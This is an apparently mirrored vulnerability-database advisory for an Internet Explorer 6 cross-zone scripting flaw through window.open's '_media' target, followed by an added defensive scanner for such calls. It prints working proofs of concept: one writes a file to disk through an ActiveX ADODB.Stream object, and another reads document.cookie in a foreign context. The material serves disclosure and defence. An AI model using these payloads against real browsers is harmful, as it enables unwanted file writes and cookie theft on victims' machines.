Microsoft Internet Explorer 6 – window.open Media Bar Cross-Zone Scripting

Vulnerability ID 1054160 Vulnerability type
Published 2003-09-11 Updated 2003-09-11
CVE ID N/A
CNNVD-ID N/A
Platform Windows CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/23768
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/9769/info

It has been reported that Microsoft Internet Explorer may be prone to a cross-zone scripting vulnerability that could ultimately lead to execution of malicious script code and Active Content in the context of the My Computer Zone or a foreign domain. Reportedly, hostile code can be executed in the context of the Media Bar via the '_media' property of the 'window.open' method. Cross-site scripting attacks are possible as well. This functionality is only available in Internet Explorer 6 and above.

This issue was originally described in BID 8577 "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities". 

<script>

// '\42' is an octal escape: octal 42 (decimal 34) is the double-quote character '"'
img_src='javascript:file = \42Exploit.txt\42; o = new ActiveXObject(\42ADODB.Stream\42);'
+ ' o.Open(); o.Type=2; o.Charset=\42ascii\42; o.WriteText(\42My name is Cheng Peng Su.\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\42I wanna create \42+file+\42 on your desktop!\42);';

inject_html="<img src='" + img_src + "'>";

window.open('file:javascript:document.write("' + inject_html + '")','_media');

</script>

Additional proof of concept for cross site scripting has been supplied as well:

<script>

window.open("http://www.google.com/","_media")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_media")
},5000);

</script>
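
For defenders reviewing page source or proxy captures, the pattern shared by both proofs of concept can be checked statically: a 'window.open' call whose target is '_media', with a 'file:' or 'javascript:' URL as the strongest signal. The scanner below is an added example, not part of the original advisory; findOpenCalls, auditMediaTargets and SAMPLE are hypothetical names, and matching the target name case-insensitively is an assumption made to err on the side of flagging.

```javascript
// Added example (defensive): flag window.open() calls that target the Media Bar.

// Return the argument list (raw source text) of every window.open(...) call,
// honouring quoted strings and nested parentheses so that a ')' or ','
// inside a URL string does not end the call early.
function findOpenCalls(src) {
  const calls = [];
  const re = /window\.open\s*\(/g;
  while (re.exec(src) !== null) {
    const args = [""];
    let depth = 1, quote = null;
    for (let i = re.lastIndex; i < src.length; i++) {
      const c = src[i];
      if (quote) {
        if (c === "\\") { args[args.length - 1] += c + (src[++i] || ""); continue; }
        if (c === quote) quote = null;
      } else if (c === '"' || c === "'") quote = c;
      else if (c === "(") depth++;
      else if (c === ")" && --depth === 0) break;
      else if (c === "," && depth === 1) { args.push(""); continue; }
      args[args.length - 1] += c;
    }
    calls.push(args.map((a) => a.trim()));
  }
  return calls;
}

// Keep only calls whose second argument is the literal '_media' target, and
// mark those whose URL literal starts with a script-bearing or local scheme.
// Case-insensitive target matching is an assumption (conservative choice).
function auditMediaTargets(src) {
  return findOpenCalls(src)
    .filter((a) => a.length >= 2 && /^["']_media["']$/i.test(a[1]))
    .map((a) => ({
      url: a[0],
      scriptScheme: /^["']\s*(file:|javascript:|vbscript:)/i.test(a[0]),
    }));
}

// Scanner input: the two calls from the second proof of concept above, plus
// one constructed benign call that must not be reported.
const SAMPLE = `
window.open("http://www.google.com/","_media")
window.open("file:javascript:alert(document.cookie);","_media")
window.open("help.html","_blank");
`;

console.log(JSON.stringify(auditMediaTargets(SAMPLE), null, 2));
```

Any '_media' hit is worth a look on pages served to Internet Explorer 6; a hit with scriptScheme set matches the shape of the proofs of concept. The check only sees literal arguments, so a target or URL built at run time needs dynamic inspection instead.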
